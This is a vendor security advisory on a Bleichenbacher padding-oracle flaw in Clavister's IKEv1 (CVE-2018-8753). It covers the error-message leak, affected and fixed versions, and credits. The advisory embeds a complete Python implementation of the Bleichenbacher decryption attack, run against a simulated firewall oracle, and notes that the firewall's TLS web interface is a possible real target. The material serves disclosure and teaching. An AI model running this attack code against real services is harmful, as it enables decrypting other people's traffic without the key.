Security Advisories
CLAV-SA-0157 Bleichenbacher Oracle Vulnerability in IKEv1
| Advisory ID | CLAV-SA-0157 |
| Summary | Bleichenbacher Oracle Vulnerability in IKEv1 |
| Updated | 2018-08-15 |
| First Published | 2018-08-15 |
| Impact | Medium |
| CVSS URL | https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:W/RC:C |
| CVSS Score | 5.9 |
| CVEs | CVE-2018-8753 |
| Affected Products | |
Introduction
Clavister's implementation of IKEv1 contains an oracle for PKCS#1 v1.5 validity. An attacker can determine whether the plaintext of the RSA-encrypted nonce sent in the third message of the handshake was PKCS#1-valid by examining the error message returned by the firewall.
Detailed Description
Clavister's IKEv1 implementation contains an oracle for PKCS#1 v1.5 validity: whether the plaintext of the RSA-encrypted nonce sent in the third message of the handshake was PKCS#1-valid can be read off the error message returned by the firewall. If the error message contains the text "Data length too large for private key to decrypt", the plaintext was valid (the handshake still fails, but the padding check passed). If the error message is only 8 bytes long, the plaintext was invalid. The two responses are trivially distinguishable by length, which is what turns the padding check into a decryption oracle.
The researchers implemented and tested an attack against cOS Core version 12.00.06. The attack efficiency has a random component that makes it hard to estimate how long it will take before an attacker can achieve successful decryption. The fastest attack the researchers performed in their test setup took 9400 requests to the firewall and 51 minutes.
The attack works as follows:
- The attacker obtains a single ciphertext encrypted under the gateway's RSA key (e.g. by eavesdropping on a handshake).
- The attacker derives new ciphertexts from the original one using the multiplicative property of RSA: multiplying the ciphertext by s^e mod n multiplies the unknown plaintext by s, without knowledge of the private key.
- Each derived ciphertext is sent to the server and the server's reaction (valid or invalid padding) is recorded.
- After doing this for thousands of ciphertexts, the accumulated yes/no answers narrow the plaintext down to a single value, and the attacker has decrypted the original ciphertext without the key.
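To make the oracle and the attack steps above concrete, here is a self-contained Python simulation added to this page; it is example code written for this advisory, not Clavister's implementation and not the researchers' attack tooling. It assumes a toy 256-bit RSA key generated from a fixed seed, a made-up nonce, and a simulated firewall that mimics the two distinguishable responses described above (the quoted "Data length too large for private key to decrypt" string for a valid plaintext, and a constructed 8-byte placeholder otherwise). The simulated check only looks at the 00 02 prefix, which is the property the attack needs; a real implementation checks more of the PKCS#1 structure, which changes the number of queries but not the outcome.

```python
"""Simulated IKEv1 PKCS#1 oracle and a Bleichenbacher attack against it (demo code)."""
import random

def is_probable_prime(n, rng, rounds=24):
    """Miller-Rabin; witnesses come from rng, so a seeded rng keeps the demo deterministic."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits, seed):
    """Toy RSA key, deliberately small so the demo runs in seconds. Returns (n, e, d)."""
    rng, e = random.Random(seed), 65537
    def prime():
        while True:
            c = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if is_probable_prime(c, rng):
                return c
    while True:
        p, q = prime(), prime()
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % e and n.bit_length() == bits:
            return n, e, pow(e, -1, phi)

def pkcs1_v15_pad(msg, k, rng):
    """EME-PKCS1-v1_5 block: 00 02 || at least 8 random non-zero bytes || 00 || msg."""
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    assert len(ps) >= 8, "message too long for this modulus"
    return b"\x00\x02" + ps + b"\x00" + msg

class FirewallOracle:
    """Stand-in for the firewall: decrypts what it receives and, as the advisory describes,
    returns a long error for a PKCS#1-valid plaintext and an 8-byte error otherwise."""
    LONG_ERROR = b"Data length too large for private key to decrypt"  # text quoted in the advisory
    SHORT_ERROR = b"ERR\x00\x00\x00\x00\x00"  # constructed: the advisory only says "8 bytes long"
    def __init__(self, n, d, k):
        self.n, self.d, self.k, self.queries = n, d, k, 0

    def respond(self, c):
        self.queries += 1
        m = pow(c, self.d, self.n).to_bytes(self.k, "big")
        # 00 02 prefix <=> plaintext in [2B, 3B), which is all the attack needs; a stricter
        # real-world check (padding string, 00 separator) only raises the query count.
        return self.LONG_ERROR if m[:2] == b"\x00\x02" else self.SHORT_ERROR

def bleichenbacher(c0, n, e, k, respond):
    """Recover m from c0 = m^e mod n. Each query is c0 * s^e mod n, which decrypts to
    m*s mod n (RSA is multiplicative); a 'valid' answer pins m*s mod n into [2B, 3B)."""
    B, ceil_div = 1 << (8 * (k - 2)), lambda a, b: -(-a // b)
    def query(s):  # the attacker never sees the plaintext, only the error length
        return len(respond(c0 * pow(s, e, n) % n)) != 8
    M = [(2 * B, 3 * B - 1)]  # c0 is already valid: no blinding step needed (s0 = 1)
    s, rounds = ceil_div(n, 3 * B), 0
    while True:
        if rounds == 0 or len(M) > 1:  # steps 2a/2b: linear search for the next s
            s += 1 if rounds else 0
            while not query(s):
                s += 1
        else:  # step 2c: a single interval is left, so jump ahead using r
            a, b = M[0]
            r, found = ceil_div(2 * (b * s - 2 * B), n), False
            while not found:
                for cand in range(ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a + 1):
                    if query(cand):
                        s, found = cand, True
                        break
                r += 1
        new_M = []  # step 3: narrow every interval using the new s
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, ceil_div(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M, rounds = new_M, rounds + 1
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]

def recover_nonce(bits=256, seed=2018):
    """Capture one ciphertext, then decrypt it through the oracle without the private key.
    Returns (recovered nonce, number of requests sent to the simulated firewall)."""
    nonce = b"IKEv1-nonce-demo"  # constructed stand-in for the eavesdropped nonce
    n, e, d = gen_key(bits, seed)
    k = bits // 8
    m = int.from_bytes(pkcs1_v15_pad(nonce, k, random.Random(seed + 1)), "big")
    fw = FirewallOracle(n, d, k)
    recovered = bleichenbacher(pow(m, e, n), n, e, k, fw.respond)
    assert recovered == m
    block = recovered.to_bytes(k, "big")
    return block[block.index(b"\x00", 2) + 1:], fw.queries  # strip the PKCS#1 padding
```

Calling `recover_nonce()` returns the recovered nonce bytes together with the number of requests the simulated firewall answered; with this key size it takes a few seconds and tens of thousands of queries, most of them in the initial linear search. The point to take from it is that the attacker never touches the private key and only needs one bit per request, so the cure is to remove the distinguishable behaviour (or, as Clavister did, the affected authentication mode) rather than to rate-limit it, which would only stretch the 51 minutes.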
Due to the timeouts of IKE SAs, the missing configuration options, and the Diffie-Hellman key exchange, it is not possible to attack the IKEv1 handshake with RSA-encrypted nonces directly. However, the oracle decrypts any PKCS#1 v1.5 ciphertext made under the same RSA key, and the gateway certificate of the device may be reused for other purposes; an attacker could therefore, for example, attack the TLS protection of the firewall's configuration web interface (TLS sessions negotiated with RSA key exchange encrypt their premaster secret under that same key).
For more details, see the researchers' blog post linked in the References section of this advisory.
Affected Versions
The following versions are affected by this vulnerability:
- All cOS Core 12.00.xx versions before 12.00.09
- All cOS Core 11.20.xx versions before 11.20.06
- All cOS Core 11.00.xx versions before 11.00.11
- Any older versions of cOS Core with IKEv1 support
Fix Information
RSA authentication was permanently disabled for IKEv1.
Security Patches
The vulnerability was fixed in the following versions:
- cOS Core 12.00.09
- cOS Core 11.20.06
- cOS Core 11.00.11
Updated versions are available for download through the My Clavister portal.
References
- https://web-in-security.blogspot.com/2018/08/practical-bleichenbacher-attacks-on-ipsec-ike.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8753
Acknowledgements
Clavister thanks the following researchers for their responsible disclosure and continuous assistance during the vulnerability triage process:
- Dennis Felsch (Ruhr-University Bochum)
- Martin Grothe (Ruhr-University Bochum)
- Jörg Schwenk (Ruhr-University Bochum)
- Adam Czubak (University of Opole)
- Marcin Szymanek (University of Opole)
Contact
- E-mail: <security@clavister.com>
- PGP: id 8813E86F, fingerprint A91407250F753C1D27263A7EBE9E30498813E86F
- WWW: Tickets can also be created through https://www.clavister.com/